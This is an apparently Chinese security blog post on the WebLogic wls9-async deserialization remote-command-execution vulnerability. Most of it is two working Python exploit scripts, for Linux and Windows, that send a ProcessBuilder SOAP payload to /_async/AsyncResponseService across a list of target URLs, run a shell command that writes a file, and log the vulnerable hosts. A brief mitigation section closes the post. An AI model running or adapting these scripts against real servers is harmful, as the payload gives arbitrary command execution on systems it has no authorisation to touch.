本文最后更新于2019年04月29日,有任何建议或疑问,欢迎底部讨论。

weblogic此漏洞可以直接执行系统命令。

漏洞范围

WebLogic 10.X
WebLogic 12.1.3

风险等级

漏洞检测

QQ截图20190426190748.png

漏洞利用

脚本如下。

linux:

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Use: python3 weblogic_wls9_async_linux.py file_name
# file: http://x.x.x.x:7001 or https://x.x.x.x:7001

import requests
import sys

print('\n')
print('正在验证中,请稍后...')
print('\n')

path='/_async/AsyncResponseService'
payload='''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo test success! > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/test.txt</string>
<string>echo test success! > servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.bea-wls9-async-response_12.1.3/2ig01a/war/test.txt</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
'''

#打开文件循环取IP并请求
f = open(sys.argv[1],'r')
result = open('result.txt','w')

for ff in f:
    try:
        header={
        'Accept-Encoding': 'gzip, deflate',
        'SOAPAction':'',
        'Accept': '*/*',
        'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
        'Connection': 'keep-alive',
        'content-type': 'text/xml',
        'Content-Length': '851'
        }
        r = requests.post(ff.strip()+path, headers=header, data=payload, timeout=10, verify=False)
        check = requests.get(ff.strip()+'/_async/test.txt', timeout=10, verify=False)
        if(r.status_code==202):
            if(check.status_code==200):
                print('[+] '+ff.strip()+' 存在wls9-async组件反序列化漏洞')
            else:
                print('[+] '+ff.strip()+' 可能存在漏洞')
            result.write(ff)
        else:
            print('[-] '+ff.strip()+' 不存在漏洞')
    except requests.exceptions.RequestException as e:
        print('[-] '+ ff.strip() + ' 连接超时')
        continue
f.close()
result.close()
print('\n请查看目录下的:result.txt')

windows

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Use: python3 weblogic_wls9_async_win.py file_name
# file: http://x.x.x.x:7001 or https://x.x.x.x:7001

import requests
import sys

print('\n')
print('正在验证中,请稍后...')
print('\n')

path='/_async/AsyncResponseService'
payload='''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>echo test success! > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/test.txt</string>
<string>echo test success! > servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.bea-wls9-async-response_12.1.3/2ig01a/war/test.txt</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
'''

#打开文件循环取IP并请求
f = open(sys.argv[1],'r')
result = open('result.txt','w')

for ff in f:
    try:
        header={
        'Accept-Encoding': 'gzip, deflate',
        'SOAPAction':'',
        'Accept': '*/*',
        'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)',
        'Connection': 'keep-alive',
        'content-type': 'text/xml',
        'Content-Length': '851'
        }
        r = requests.post(ff.strip()+path, headers=header, data=payload, timeout=10, verify=False)
        check = requests.get(ff.strip()+'/_async/test.txt', timeout=10, verify=False)
        if(r.status_code==202):
            if(check.status_code==200):
                print('[+] '+ff.strip()+' 存在wls9-async组件反序列化漏洞')
            else:
                print('[+] '+ff.strip()+' 可能存在漏洞')
            result.write(ff)
        else:
            print('[-] '+ff.strip()+' 不存在漏洞')
    except requests.exceptions.RequestException as e:
        print('[-] '+ ff.strip() + ' 连接超时')
        continue
f.close()
result.close()
print('\n请查看目录下的:result.txt')

加固方法

Oracle官方暂未发布补丁,临时解决方案如下:
1.删除bea_wls9_async_response.war包或者com.oracle.webservices.wls.bea-wls9-async-response_12.1.3.war包,及相关文件夹,并重启WebLogic服务。
2.通过访问策略控制禁止/_async/*路径的URL访问。

文章目录